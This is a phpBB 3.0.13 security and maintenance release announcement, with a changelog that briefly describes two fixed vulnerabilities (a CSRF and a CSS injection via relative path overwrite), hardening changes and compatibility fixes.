We are pleased to announce the "Return of the Bertie" release of phpBB 3.0.13. This version is a security and maintenance release of the 3.0.x branch which hardens phpBB against potential attacks and fixes a number of bugs. You do not need to install this update if you are running phpBB 3.1.x.
The first vulnerability is a CSRF potentially allowing an attacker to modify the private message setting that determines how full folders are handled (i.e. whether to delete the oldest message or hold the new message until further space is available). Users FBNeal and lampsys independently reported the issue to us.
The second issue, reported to us by James Kettle, allows an attacker to load arbitrary CSS in Internet Explorer by crafting a URL with trailing paths after a PHP file (for example /path/index.php/more/path). This is only possible if the webserver configuration allows accessing PHP files in this manner. This can be exploited directly on Internet Explorer 7 or below, and on newer versions of Internet Explorer by using a frame that forces outdated rendering behavior.
Neither of these issues affects phpBB 3.1.x.
Thank you to James Kettle, FBNeal, and lampsys for responsibly reporting these issues to us.
This release further improves compatbility with PHP 5.6, Apache 2.4, Internet Explorer 11, and Microsoft Azure.
The full changelog is available in the changelog file within the docs folder contained in the release package. You can find the key highlights of this release on the wiki at https://wiki.phpbb.com/Release_Highlights/3.0.13 and a list of all issues fixed on our tracker at https://tracker.phpbb.com/issues/?filter=12892
The packages can be downloaded from our downloads page.
The development team thanks everyone who contributed code to this release: Oliver Schramm, erangamapa, Crizzo, s9e, Vjacheslav Trushkin, Jakub Senko, geetakshi, Marcos Bjorkelund, Marcus Vinicius, Matt Friedman, n-aleha, rechosen, Daniel Schosser, David Prévot, Falk Seidel, Igor Wiedler, Mario Skouat, Prosk8er
If you have any questions or comments, we'll be happy to address them in the discussion topic.
- The phpBB Team
Security and Hardening
- Security (CVE-2015-1431): CSS Injection via Relative Path Overwrite. Thanks to James Kettle for bringing this to our attention. See PHPBB3-13531.
- Security (CVE-2015-1432): The ucp_pm_options form key is now properly validated. Thanks to FBNeal and lampsys who reported this independently. See PHPBB3-13526.
- Hardening: Information received from the phpBB version server is now considered untrusted. See PHPBB3-13527.
- Hardening: The deregister_globals() function now better handles the case when $_COOKIE['GLOBALS'] is specified. See PHPBB3-13376.
- Hardening: Existence of the path to the imagick program specified in the Administration Control Panel is now verified. See PHPBB3-13519.
- Abuse Prevention: The "Send password" feature now sends anti-abuse headers in e-mail messages. See PHPBB3-11799.
- Improved Compatibility with Apache 2.4. See PHPBB3-11860.
- Improved Compatibility with PHP 5.6. See PHPBB3-12468, PHPBB3-13096 and PHPBB3-13168.
- Improved Compatibility with Internet Explorer 11. See PHPBB3-12093.
- Improved Compatibility with Microsoft Azure. See PHPBB3-9725 and PHPBB3-10796
- "Edit signature" in the User Control Panel now correctly allows smilies to be selected for insertion. See PHPBB3-10037.
- Remote avatar upload now works correctly when HTTP server uses Keep-Alive. See PHPBB3-12755.
- An issue was fixed where the board would not load correctly for banned users. See PHPBB3-13138.
- Language strings containing numbers can now be used as HTML replacement in Custom BBcodes. See PHPBB3-12048.
- Cookies now work properly on local networks. See PHPBB3-11613.
- Published package are now checksummed using the SHA-256 algorithm instead of MD5. See PHPBB3-11876.